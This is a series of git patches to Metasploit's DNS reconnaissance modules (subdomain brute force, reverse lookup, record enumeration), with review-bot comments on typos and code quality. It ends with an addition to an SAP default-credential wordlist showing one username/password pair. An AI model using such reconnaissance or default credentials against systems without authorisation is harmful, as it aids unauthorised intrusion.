<carlos_perez[at]darkoperator.com>' ], 'License' => BSD_LICENSE 
@@ -26,14 +26,14 @@ def initialize(info = {}) register_options( [ OptString.new('DOMAIN', [ true, "The target domain name"]), - OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS" ]), + OptAddress.new('NS', [ false, "Specify the name server to use for queries, otherwise use the system configured DNS Server is used." ]), ], self.class) register_advanced_options( [ - OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 2]), - OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 2]), + OptInt.new('RETRY', [ false, "Number of tries to resolve a record if no response is received.", 2]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 2]), ], self.class) end @@ -98,9 +98,9 @@ def wildcard(target) rendsub = rand(10000).to_s query = @res.query("#{rendsub}.#{target}", "A") if query.answer.length != 0 - print_status("This Domain has Wildcards Enabled!!") + print_status("This Domain has Wild-cards Enabled!!") query.answer.each do |rr| - print_status("Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME + print_status("Wild-card IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME report_note(:host => datastore['DOMAIN'], :proto => 'UDP', :port => 53, @@ -228,7 +228,7 @@ def get_mx(target) #--------------------------------------------------------------------------------- def switchdns() - print_status("Using DNS Server: #{datastore['NS']}") + print_status("Using DNS server: #{datastore['NS']}") @res.nameserver=(datastore['NS']) @nsinuse = datastore['NS'] end From 7f97ff271f9ffafb691d820b21ac2af9a7dcc7d3 Mon Sep 17 00:00:00 2001 
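Review bot: The rewritten `NS` option text, `"Specify the name server to use for queries, otherwise use the system configured DNS Server is used."`, is no longer a sentence; it merges two phrasings. It should read `"Specify the name server to use for queries, otherwise the system-configured DNS server is used."`. The following hunk also changes "Wildcards" to "Wild-cards" in the status messages, which no longer matches the `wildcard` method name or the `dns.wildcard` note type used in the same file.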
From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 15:44:32 -0400 Subject: [PATCH 387/421] Fix spelling problems --- modules/auxiliary/gather/dns_bruteforce.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/gather/dns_bruteforce.rb b/modules/auxiliary/gather/dns_bruteforce.rb index 070c32f0cca3..99a5e3043458 100644 --- a/modules/auxiliary/gather/dns_bruteforce.rb +++ b/modules/auxiliary/gather/dns_bruteforce.rb @@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Host and Subdomain Brutefoce Module', + 'Name' => 'DNS host and subdomain brutefoce module', 'Description' => %q{ - This module uses a dictionary to perform a bruteforce on Hostnames and Subdomains + The module uses a dictionary to perform a bruteforce on hostnames and subdomains available under a given domain. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], @@ -26,7 +26,7 @@ def initialize(info = {}) register_options( [ OptString.new('DOMAIN', [ true, "The target domain name"]), - OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS" ]), + OptAddress.new('NS', [ false, "Specify the name server to use for queries, otherwise use the system DNS" ]), OptPath.new('WORDLIST', [ false, "Wordlist file for domain name brute force.", File.join(Msf::Config.install_root, "data", "wordlists", "namelist.txt")]), 
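Review bot: `'Name' => 'DNS host and subdomain brutefoce module'` keeps the misspelling "brutefoce" in a commit whose purpose is to fix spelling, and the later patches 392 and 395 in this series carry it forward as `'DNS Host and Subdomain Brutefoce'`. The name should be `'Name' => 'DNS Host and Subdomain Bruteforce',`. The module name is what users see in search results, so the typo also makes the module harder to find.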
@@ -34,8 +34,8 @@ def initialize(info = {}) register_advanced_options( [ - OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 2]), - OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 2]), + OptInt.new('RETRY', [ false, "Number of tries to resolve a record if no response is received.", 2]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 2]), OptInt.new('THREADS', [ false, "Number of threads", 1]), ], self.class) end @@ -55,9 +55,9 @@ def wildcard(target) rendsub = rand(10000).to_s query = @res.query("#{rendsub}.#{target}", "A") if query.answer.length != 0 - print_status("This Domain has Wildcards Enabled!!") + print_status("This Domain has wild-cards enabled!!") query.answer.each do |rr| - print_warning("Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME + print_warning("Wild-card IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME end return true else @@ -101,7 +101,7 @@ def get_ip(host) #--------------------------------------------------------------------------------- def switchdns() - print_status("Using DNS Server: #{datastore['NS']}") + print_status("Using DNS server: #{datastore['NS']}") @res.nameserver=(datastore['NS']) @nsinuse = datastore['NS'] end From a7d4f5ff4ad184a003856cffacc7b968018a64e5 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 15:46:36 -0400 Subject: [PATCH 388/421] Fix spelling problems --- modules/auxiliary/gather/dns_reverse_lookup.rb | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index cc102b92350a..28019c733206 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb 
@@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Reverse Lookup', + 'Name' => 'DNS reverse lookup', 'Description' => %q{ - This module performs a Reverse Lookup against a given IP Range. + The module performs a reverse rookup against a given IP range. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], 'License' => BSD_LICENSE @@ -24,16 +24,16 @@ def initialize(info = {}) register_options( [ - OptAddressRange.new('RANGE', [true, 'IP Range to perform reverse lookup against.', nil]), - OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS" ]), + OptAddressRange.new('RANGE', [true, 'IP range to perform reverse lookup against.', nil]), + OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS." ]), ], self.class) register_advanced_options( [ - OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 2]), - OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 2]), - OptInt.new('THREADS', [ true, "Number of seconds to wait before doing a retry", 2]), + OptInt.new('RETRY', [ false, "Number of tries to resolve a record if no response is received.", 2]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 2]), + OptInt.new('THREADS', [ true, "Number of seconds to wait before doing a retry.", 2]), ], self.class) end @@ -55,7 +55,7 @@ def run #------------------------------------------------------------------------------- def reverselkp(iprange) - print_status("Running Reverse Lookup against ip range #{iprange}") + print_status("Running reverse lookup against IP range #{iprange}") ar = Rex::Socket::RangeWalker.new(iprange) tl = [] while (true) 
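Review bot: The new description line `The module performs a reverse rookup against a given IP range.` introduces the typo "rookup"; the removed line had "Lookup" spelled correctly. It should be `This module performs a reverse lookup against a given IP range.`. Patches 393 and 394 later in the series touch this description and name again but leave "rookup" in place.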
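Review bot: In the advanced options, `THREADS` is described as `"Number of seconds to wait before doing a retry."`, which is the `RETRY_INTERVAL` text copied onto the wrong option; this commit only adds a full stop to it. The line should be `OptInt.new('THREADS', [ true, "Number of threads to use.", 2]),`. The sibling module dns_bruteforce.rb already describes the same option as "Number of threads".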
@@ -93,7 +93,7 @@ def reverselkp(iprange) #--------------------------------------------------------------------------------- def switchdns() - print_status("Using DNS Server: #{datastore['NS']}") + print_status("Using DNS server: #{datastore['NS']}") @res.nameserver=(datastore['NS']) @nsinuse = datastore['NS'] end From 23320a5ddebd352937299b3b901886b6ee84966e Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 15:48:11 -0400 Subject: [PATCH 389/421] Fix spelling problems --- modules/auxiliary/gather/dns_srv.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/dns_srv.rb b/modules/auxiliary/gather/dns_srv.rb index eac4bbe21429..b2eeb30287f7 100644 --- a/modules/auxiliary/gather/dns_srv.rb +++ b/modules/auxiliary/gather/dns_srv.rb @@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Reverse Lookup', + 'Name' => 'DNS service record lookup', 'Description' => %q{ - The module enumerates common DNS Service Records. + The module enumerates common DNS service records. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], 'License' => BSD_LICENSE From 0b9d4d976fab6595cbf1381a8f3ef577a001944a Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 21:44:31 -0400 Subject: [PATCH 390/421] more changes to description and name --- modules/auxiliary/gather/dns_srv.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/dns_srv.rb b/modules/auxiliary/gather/dns_srv.rb index b2eeb30287f7..a80e864b20f5 100644 --- a/modules/auxiliary/gather/dns_srv.rb +++ b/modules/auxiliary/gather/dns_srv.rb 
@@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS service record lookup', + 'Name' => 'DNS Common Service Record Enumeration', 'Description' => %q{ - The module enumerates common DNS service records. + This module enumerates common DNS service records. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], 'License' => BSD_LICENSE From 1b8610042ad48b29098de6aa6ccfb73e8d46408b Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 21:46:21 -0400 Subject: [PATCH 391/421] more changes to description and name --- modules/auxiliary/gather/dns_info.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/dns_info.rb b/modules/auxiliary/gather/dns_info.rb index fd11a82a7122..c036b2a95e2f 100644 --- a/modules/auxiliary/gather/dns_info.rb +++ b/modules/auxiliary/gather/dns_info.rb @@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Base Information', + 'Name' => 'DNS Basic Information', 'Description' => %q{ - The module enumerates basic DNS information for a given domain. Information + This module enumerates basic DNS information for a given domain. Information enumerated is A, AAAA, NS and MX records for the given domain. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], From faf970cf1f4694483b0dabdcaaf7412ba97a9834 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 21:47:43 -0400 Subject: [PATCH 392/421] more changes to description and name --- modules/auxiliary/gather/dns_bruteforce.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/dns_bruteforce.rb b/modules/auxiliary/gather/dns_bruteforce.rb index 99a5e3043458..2372c93bbc34 100644 --- a/modules/auxiliary/gather/dns_bruteforce.rb 
+++ b/modules/auxiliary/gather/dns_bruteforce.rb @@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS host and subdomain brutefoce module', + 'Name' => 'DNS Host and Subdomain Brutefoce Module', 'Description' => %q{ - The module uses a dictionary to perform a bruteforce on hostnames and subdomains + This module uses a dictionary to perform a bruteforce on hostnames and subdomains available under a given domain. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], From 7f7b4e5a97cfcd280ce130bc0862d4be57d85e65 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 21:49:57 -0400 Subject: [PATCH 393/421] more changes to description and name --- modules/auxiliary/gather/dns_reverse_lookup.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index 28019c733206..54de8d81bc83 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS reverse lookup', + 'Name' => 'DNS Reverse Lookup Enumeration Module', 'Description' => %q{ - The module performs a reverse rookup against a given IP range. + This module performs a reverse rookup against a given IP range. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], 'License' => BSD_LICENSE From 1d64de6c11c31f5d17db6e73d95804cc7ed94f53 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 21:55:38 -0400 Subject: [PATCH 394/421] Typo word module does not go in the name. --- modules/auxiliary/gather/dns_reverse_lookup.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index 54de8d81bc83..20826e56d81e 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -14,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Reverse Lookup Enumeration Module', + 'Name' => 'DNS Reverse Lookup Enumeration', 'Description' => %q{ This module performs a reverse rookup against a given IP range. }, From bcd59aa8faae0d8d644a7410dc6da0a2197e8797 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 21:56:24 -0400 Subject: [PATCH 395/421] Typo word module does not go in the name. --- modules/auxiliary/gather/dns_bruteforce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/dns_bruteforce.rb b/modules/auxiliary/gather/dns_bruteforce.rb index 2372c93bbc34..c41403f7e971 100644 --- a/modules/auxiliary/gather/dns_bruteforce.rb +++ b/modules/auxiliary/gather/dns_bruteforce.rb @@ -14,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Host and Subdomain Brutefoce Module', + 'Name' => 'DNS Host and Subdomain Brutefoce', 'Description' => %q{ This module uses a dictionary to perform a bruteforce on hostnames and subdomains available under a given domain. From 57e1d1baa5b3e4fe047ab5bd0c06067b400080c4 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 15 Feb 2013 12:03:08 +0100 Subject: [PATCH 396/421] cleanup for dns_info --- modules/auxiliary/gather/dns_info.rb | 145 +++++++++++++-------------- 1 file changed, 70 insertions(+), 75 deletions(-) diff --git a/modules/auxiliary/gather/dns_info.rb b/modules/auxiliary/gather/dns_info.rb index c036b2a95e2f..21c84de8ae98 100644 --- a/modules/auxiliary/gather/dns_info.rb +++ b/modules/auxiliary/gather/dns_info.rb 
@@ -14,14 +14,16 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Basic Information', - 'Description' => %q{ - This module enumerates basic DNS information for a given domain. Information - enumerated is A, AAAA, NS and MX records for the given domain. + 'Name' => 'DNS Basic Information Enumeration', + 'Description' => %q{ + This module enumerates basic DNS information for a given domain. The module + gets information regarding to A (addresses), AAAA (IPv6 addresses), NS (name + servers), SOA (start of authority) and MX (mail servers) records for a given + domain. In addition, this module retrieves information stored in TXT records. }, - 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], - 'License' => BSD_LICENSE - )) + 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], + 'License' => BSD_LICENSE + )) register_options( [ @@ -50,15 +52,15 @@ def run end wildcard(datastore['DOMAIN']) - switchdns() if not datastore['NS'].nil? + switchdns() unless datastore['NS'].nil? or datastore['NS'].empty? get_ip(datastore['DOMAIN']).each do |r| - print_good("#{r[:host]} #{r[:address]} #{r[:type]}") + print_good("#{r[:host]} - Address #{r[:address]} found. Record type: #{r[:type]}") report_host(:host => r[:address]) end get_ns(datastore['DOMAIN']).each do |r| - print_good("#{r[:host]} #{r[:address]} #{r[:type]}") + print_good("#{datastore['DOMAIN']} - Name server #{r[:host]} (#{r[:address]}) found. Record type: #{r[:type]}") report_host(:host => r[:address], :name => r[:host]) report_service( :host => r[:address], 
@@ -69,12 +71,12 @@ def run end get_soa(datastore['DOMAIN']).each do |r| - print_good("#{r[:host]} #{r[:address]} #{r[:type]}") + print_good("#{datastore['DOMAIN']} - #{r[:host]} (#{r[:address]}) found. Record type: #{r[:type]}") report_host(:host => r[:address], :name => r[:host]) end get_mx(datastore['DOMAIN']).each do |r| - print_good("#{r[:host]} #{r[:address]} #{r[:type]}") + print_good("#{datastore['DOMAIN']} - Mail server #{r[:host]} (#{r[:address]}) found. Record type: #{r[:type]}") report_host(:host => r[:address], :name => r[:host]) report_service( :host => r[:address], @@ -85,15 +87,17 @@ def run end get_txt(datastore['DOMAIN']).each do |r| - report_note(:host => datastore['DOMAIN'], - :proto => 'UDP', - :port => 53, - :type => 'dns.info', - :data => {:text => r[:text]}) + print_good("#{datastore['DOMAIN']} - Text info found: #{r[:text]}. Record type: #{r[:type]}") + report_note( + :host => datastore['DOMAIN'], + :proto => 'udp', + :port => 53, + :type => 'dns.info', + :data => {:text => r[:text]} + ) end end - #--------------------------------------------------------------------------------- def wildcard(target) rendsub = rand(10000).to_s query = @res.query("#{rendsub}.#{target}", "A") @@ -101,11 +105,13 @@ def wildcard(target) print_status("This Domain has Wild-cards Enabled!!") query.answer.each do |rr| print_status("Wild-card IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME - report_note(:host => datastore['DOMAIN'], - :proto => 'UDP', - :port => 53, - :type => 'dns.wildcard', - :data => "Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") + report_note( + :host => datastore['DOMAIN'], + :proto => 'UDP', + :port => 53, + :type => 'dns.wildcard', + :data => "Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}" + ) end return true else 
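Review bot: The new `print_good` in the `get_txt` loop of `run` interpolates `r[:text]` straight into console output, and TXT record content is whatever the queried zone's operator chose to publish. Unless the framework's print helpers already neutralise control characters (not visible here), non-printable bytes in a TXT record reach the operator's terminal and logs as-is. Printing an escaped form, e.g. `print_good("#{datastore['DOMAIN']} - Text info found: #{r[:text].inspect}. Record type: #{r[:type]}")`, keeps the output unambiguous, and the value stored by `report_note` can stay raw. `run` starts and ends outside this hunk.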
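Review bot: The reformatted `report_note` call in `wildcard` still passes `:proto => 'UDP'`, while the TXT `report_note` in `run` (previous hunk) was switched to `'udp'` in this same commit. If the reporting layer compares protocol strings case-sensitively (an assumption, it is not shown here), the two note types end up under different protocol values. Changing this line to `:proto => 'udp',` makes both calls agree. `wildcard` continues past the end of the hunk.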
@@ -113,11 +119,10 @@ def wildcard(target) end end - #--------------------------------------------------------------------------------- def get_ip(host) results = [] query = @res.search(host, "A") - if (query) + if query query.answer.each do |rr| record = {} record[:host] = host @@ -127,7 +132,7 @@ def get_ip(host) end end query1 = @res.search(host, "AAAA") - if (query1) + if query1 query1.answer.each do |rr| record = {} record[:host] = host 
@@ -139,94 +144,84 @@ def get_ip(host) return results end - #--------------------------------------------------------------------------------- def get_ns(target) results = [] query = @res.query(target, "NS") - if (query) - (query.answer.select { |i| i.class == Net::DNS::RR::NS}).each do |rr| - get_ip(rr.nsdname).each do |r| - record = {} - record[:host] = rr.nsdname.gsub(/\.$/,'') - record[:type] = "NS" - record[:address] = r[:address].to_s - results << record - end + return results if not query + (query.answer.select { |i| i.class == Net::DNS::RR::NS}).each do |rr| + get_ip(rr.nsdname).each do |r| + record = {} + record[:host] = rr.nsdname.gsub(/\.$/,'') + record[:type] = "NS" + record[:address] = r[:address].to_s + results << record end end return results end - #--------------------------------------------------------------------------------- def get_soa(target) results = [] query = @res.query(target, "SOA") - if (query) - (query.answer.select { |i| i.class == Net::DNS::RR::SOA}).each do |rr| - if Rex::Socket.dotted_ip?(rr.mname) + return results if not query + (query.answer.select { |i| i.class == Net::DNS::RR::SOA}).each do |rr| + if Rex::Socket.dotted_ip?(rr.mname) + record = {} + record[:host] = rr.mname + record[:type] = "SOA" + record[:address] = rr.mname + results << record + else + get_ip(rr.mname).each do |ip| record = {} - record[:host] = rr.mname + record[:host] = rr.mname.gsub(/\.$/,'') record[:type] = "SOA" - record[:address] = rr.mname + record[:address] = ip[:address].to_s results << record - else - get_ip(rr.mname).each do |ip| - record = {} - record[:host] = rr.mname.gsub(/\.$/,'') - record[:type] = "SOA" - record[:address] = ip[:address].to_s - results << record - end end end end return results end - #--------------------------------------------------------------------------------- def get_txt(target) results = [] query = @res.query(target, "TXT") - if (query) - query.answer.each do |rr| - record = {} - print_good("Text: #{rr.txt}, TXT") - 
record[:host] = target - record[:text] = rr.txt - record[:type] = "TXT" - results << record - end + return results if not query + query.answer.each do |rr| + record = {} + record[:host] = target + record[:text] = rr.txt + record[:type] = "TXT" + results << record end return results end - #--------------------------------------------------------------------------------- def get_mx(target) results = [] query = @res.query(target, "MX") - if (query) - (query.answer.select { |i| i.class == Net::DNS::RR::MX}).each do |rr| - if Rex::Socket.dotted_ip?(rr.exchange) + return results if not query + (query.answer.select { |i| i.class == Net::DNS::RR::MX}).each do |rr| + if Rex::Socket.dotted_ip?(rr.exchange) + record = {} + record[:host] = rr.exchange + record[:type] = "MX" + record[:address] = rr.exchange + results << record + else + get_ip(rr.exchange).each do |ip| record = {} - record[:host] = rr.exchange + record[:host] = rr.exchange.gsub(/\.$/,'') record[:type] = "MX" - record[:address] = rr.exchange + record[:address] = ip[:address].to_s results << record - else - get_ip(rr.exchange).each do |ip| - record = {} - record[:host] = rr.exchange.gsub(/\.$/,'') - record[:type] = "MX" - record[:address] = ip[:address].to_s - results << record - end end end end return results end - #--------------------------------------------------------------------------------- def switchdns() print_status("Using DNS server: #{datastore['NS']}") @res.nameserver=(datastore['NS']) From 6aed858f8063ba45172b74c34b7dadd8bb1993a1 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 15 Feb 2013 12:37:46 +0100 Subject: [PATCH 397/421] cleanup for dns_bruteforce --- modules/auxiliary/gather/dns_bruteforce.rb | 26 +++++++++------------- 1 file changed, 11 insertions(+), 15 deletions(-) diff --git a/modules/auxiliary/gather/dns_bruteforce.rb b/modules/auxiliary/gather/dns_bruteforce.rb index c41403f7e971..74ca1672ecdc 100644 --- a/modules/auxiliary/gather/dns_bruteforce.rb 
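Review bot: The re-indented `gsub(/\.$/,'')` calls in `get_ns`, `get_soa` and `get_mx` strip the trailing dot with a `$` anchor, which in Ruby matches at every line end rather than only at the end of the string. The names come from DNS answers and are stored via `report_host`, so if the resolver library passes label bytes through unescaped (not visible here), a name with an embedded newline would lose a dot mid-string. `rr.nsdname.sub(/\.\z/, '')`, and the same for `rr.mname` and `rr.exchange`, removes exactly one final dot. The same pattern recurs in the dns_srv cleanup hunks later in this series. As a smaller style point, `return results if not query` reads better as `return results unless query`.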
+++ b/modules/auxiliary/gather/dns_bruteforce.rb 
@@ -14,43 +14,41 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Host and Subdomain Brutefoce', + 'Name' => 'DNS Brutefoce Enumeration', 'Description' => %q{ - This module uses a dictionary to perform a bruteforce on hostnames and subdomains - available under a given domain. + This module uses a dictionary to perform a bruteforce attack to enumerate + hostnames and subdomains available under a given domain. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], 'License' => BSD_LICENSE - )) + )) register_options( [ OptString.new('DOMAIN', [ true, "The target domain name"]), OptAddress.new('NS', [ false, "Specify the name server to use for queries, otherwise use the system DNS" ]), - OptPath.new('WORDLIST', [ false, "Wordlist file for domain name brute force.", - File.join(Msf::Config.install_root, "data", "wordlists", "namelist.txt")]), - + OptPath.new('WORDLIST', [ true, "Wordlist file for domain name brute force.", + File.join(Msf::Config.install_root, "data", "wordlists", "namelist.txt")]) ], self.class) register_advanced_options( [ OptInt.new('RETRY', [ false, "Number of tries to resolve a record if no response is received.", 2]), OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 2]), - OptInt.new('THREADS', [ false, "Number of threads", 1]), + OptInt.new('THREADS', [ true, "Number of threads", 1]) ], self.class) end def run print_status("Enumerating #{datastore['DOMAIN']}") @res = Net::DNS::Resolver.new() - @res.retry = datastore['RETRY'].to_i - @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + @res.retry = datastore['RETRY'].to_i unless datastore['RETRY'].nil? + @res.retry_interval = datastore['RETRY_INTERVAL'].to_i unless datastore['RETRY_INTERVAL'].nil? wildcard(datastore['DOMAIN']) - switchdns() if not datastore['NS'].nil? + switchdns() unless datastore['NS'].nil? 
dnsbrt(datastore['DOMAIN']) end - #--------------------------------------------------------------------------------- def wildcard(target) rendsub = rand(10000).to_s query = @res.query("#{rendsub}.#{target}", "A") @@ -65,7 +63,6 @@ def wildcard(target) end end - #--------------------------------------------------------------------------------- def get_ip(host) results = [] query = @res.search(host, "A") @@ -99,7 +96,6 @@ def get_ip(host) return results end - #--------------------------------------------------------------------------------- def switchdns() print_status("Using DNS server: #{datastore['NS']}") @res.nameserver=(datastore['NS']) @@ -119,7 +115,7 @@ def dnsbrt(domain) Thread.current.kill if not testf vprint_status("Testing #{testf}.#{domain}") get_ip("#{testf}.#{domain}").each do |i| - print_good("#{i[:host]} #{i[:address]}") + print_good("Host #{i[:host]} with address #{i[:address]} found") report_host( :host => i[:address].to_s, :name => i[:host].gsub(/\.$/,'') From 38f5fbced32dba8238a1a84b04fee141403863db Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 15 Feb 2013 12:56:01 +0100 Subject: [PATCH 398/421] cleanup for dns_reverse_lookup --- .../auxiliary/gather/dns_reverse_lookup.rb | 23 ++++++++----------- 1 file changed, 10 insertions(+), 13 deletions(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index 20826e56d81e..80ae0a844f9c 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb 
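Review bot: `switchdns() unless datastore['NS'].nil?` in `run` does not cover an empty `NS` value, whereas the dns_info cleanup in this series guards the same call with `.nil? or .empty?`. If an unset `OptAddress` can surface as an empty string (the dns_info change suggests it can), `@res.nameserver=` would be handed `''`; use `switchdns() unless datastore['NS'].nil? || datastore['NS'].empty?` here and in the matching line of the dns_reverse_lookup cleanup. The new module name `'DNS Brutefoce Enumeration'` also still carries the `Brutefoce` typo.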
@@ -16,24 +16,24 @@ def initialize(info = {}) super(update_info(info, 'Name' => 'DNS Reverse Lookup Enumeration', 'Description' => %q{ - This module performs a reverse rookup against a given IP range. + This module performs DNS reverse lookup against a given IP range in order to + retrieve valid addresses and names. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], 'License' => BSD_LICENSE - )) + )) register_options( [ - OptAddressRange.new('RANGE', [true, 'IP range to perform reverse lookup against.', nil]), - OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS." ]), - + OptAddressRange.new('RANGE', [true, 'IP range to perform reverse lookup against.']), + OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS." ]) ], self.class) register_advanced_options( [ OptInt.new('RETRY', [ false, "Number of tries to resolve a record if no response is received.", 2]), OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 2]), - OptInt.new('THREADS', [ true, "Number of seconds to wait before doing a retry.", 2]), + OptInt.new('THREADS', [ true, "The number of concurrent threads.", 1]) ], self.class) end @@ -49,11 +49,10 @@ def run end @threadnum = datastore['THREADS'].to_i - switchdns() if not datastore['NS'].nil? + switchdns() unless datastore['NS'].nil? reverselkp(datastore['RANGE']) end - #------------------------------------------------------------------------------- def reverselkp(iprange) print_status("Running reverse lookup against IP range #{iprange}") ar = Rex::Socket::RangeWalker.new(iprange) 
@@ -67,11 +66,10 @@ def reverselkp(iprange) begin query = @res.query(tip) query.each_ptr do |addresstp| - print_status("Host Name: #{addresstp} IP Address: #{tip.to_s}") - + print_status("Host Name: #{addresstp}, IP Address: #{tip.to_s}") report_host( - :host => tip.to_s, - :name => addresstp + :host => tip.to_s, + :name => addresstp ) end rescue ::Interrupt @@ -91,7 +89,6 @@ def reverselkp(iprange) end end - #--------------------------------------------------------------------------------- def switchdns() print_status("Using DNS server: #{datastore['NS']}") @res.nameserver=(datastore['NS']) From 65194441122d858f02c52d896fc933a3ab1cbdae Mon Sep 17 00:00:00 2001 From: Chris John Riley <reg@c22.cc> Date: Fri, 15 Feb 2013 13:35:25 +0100 Subject: [PATCH 399/421] Addition defaults --- data/wordlists/sap_default.txt | 3 +++ 1 file changed, 3 insertions(+) diff --git a/data/wordlists/sap_default.txt b/data/wordlists/sap_default.txt index dcd73dd49cdf..2102fd069bf3 100644 --- a/data/wordlists/sap_default.txt +++ b/data/wordlists/sap_default.txt @@ -12,3 +12,6 @@ ADS_AGENT ch4ngeme 